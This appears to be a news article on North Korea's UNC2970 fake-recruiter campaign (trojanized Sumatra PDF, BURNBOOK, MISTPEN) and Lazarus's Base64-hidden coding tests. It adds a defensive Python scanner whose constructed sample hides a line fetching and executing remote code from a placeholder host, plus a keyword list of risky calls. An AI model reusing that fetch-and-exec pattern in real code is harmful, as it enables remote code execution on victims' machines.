North Korean hackers have been using a new malware called MISTPEN to target employees in the energy and aerospace industries. The group, tracked as UNC2970 by Mandiant, is linked to the Lazarus Group and North Korea’s primary intelligence agency, the Reconnaissance General Bureau. UNC2970 targets victims by posing as recruiters for prominent companies.
They modify legitimate job postings to fit their target profiles, focusing on senior and manager-level employees to gain access to sensitive information. The attackers engage victims over email and WhatsApp to build trust before sending a malicious ZIP archive disguised as a job description. The PDF file in the archive can only be opened with a trojanized version of Sumatra PDF, a legitimate PDF reader application.
Opening the PDF with the bundled reader triggers the execution of a malicious DLL called BURNBOOK, which drops the MISTPEN backdoor and executes it after the system reboots. MISTPEN is a trojanized version of a Notepad++ plugin that can download and execute files from a command-and-control server.
North Korean hackers exploit job postings
Mandiant discovered older BURNBOOK and MISTPEN artifacts, indicating that the malware is being iteratively improved to add capabilities and evade detection. The threat actor has enhanced its malware over time by implementing new features and adding a network connectivity check to hinder analysis. In a related VMConnect campaign, the Lazarus Group has been using employment opportunities to infect employers’ devices with malware, mainly targeting the Python development community.
They have duplicated popular open-source Python tools and infected them with malware, and more recently they have used coding tests to trick users into installing malware concealed with Base64 encoding. Experts advise employers and developers to exercise caution when handling coding tests and open-source tools, especially those related to Python development. Continuous vigilance and proper cybersecurity measures are essential to prevent such malware attacks from succeeding.
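As an added illustration of the Base64 concealment trick described above (example code written for this page, not a tool from Mandiant or the article), the following scanner parses a Python "coding test" file and flags string literals that are long Base64 blobs decoding to code-like text. The sample files, the keyword list and the 40-character threshold are constructed assumptions for the demonstration; the hidden text in the sample is harmless and only mimics the shape of the technique.

```python
import ast
import base64
import binascii
import re

# Constructed sample inputs: a clean file and one that hides a stage in Base64.
SAMPLE_OK = 'def add(a, b):\n    return a + b\n'
HIDDEN = base64.b64encode(
    b'import urllib.request\n'
    b'exec(urllib.request.urlopen("http://example.invalid").read())'
).decode()
SAMPLE_SUSPICIOUS = (
    'import base64\n'
    'def add(a, b):\n    return a + b\n'
    f'exec(base64.b64decode("{HIDDEN}"))\n'
)

# Assumed heuristics: a literal of 40+ Base64 characters whose decoded text
# contains any of these tokens is worth a human look.
B64_RE = re.compile(r'^[A-Za-z0-9+/=]{40,}$')
RISKY = ('exec(', 'eval(', 'urlopen', 'subprocess', 'socket', '__import__')


def _decode(blob):
    """Strictly decode a Base64 string; return None if it is not valid Base64."""
    try:
        return base64.b64decode(blob, validate=True).decode('utf-8', 'replace')
    except (binascii.Error, ValueError):
        return None


def find_hidden_payloads(source):
    """Return findings (line number, decoded preview) for Base64 literals
    in `source` that decode to text containing a RISKY token."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if B64_RE.match(node.value):
                decoded = _decode(node.value)
                if decoded and any(tok in decoded for tok in RISKY):
                    findings.append({'line': node.lineno,
                                     'decoded_preview': decoded[:60]})
    return findings


if __name__ == '__main__':
    print('clean file:', find_hidden_payloads(SAMPLE_OK))
    print('coding test:', find_hidden_payloads(SAMPLE_SUSPICIOUS))
```

Run it over any file you are asked to execute as part of a recruiting exercise before executing anything; a hit means the file deserves manual review in a sandbox rather than a run on a developer workstation.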
North Korean cyberespionage groups have escalated their attacks, especially following Kim Jong Un’s announcement to modernize the country’s military and industrial assets. Organizations must remain vigilant and enforce robust security measures to protect their assets and information as these threats continue to evolve.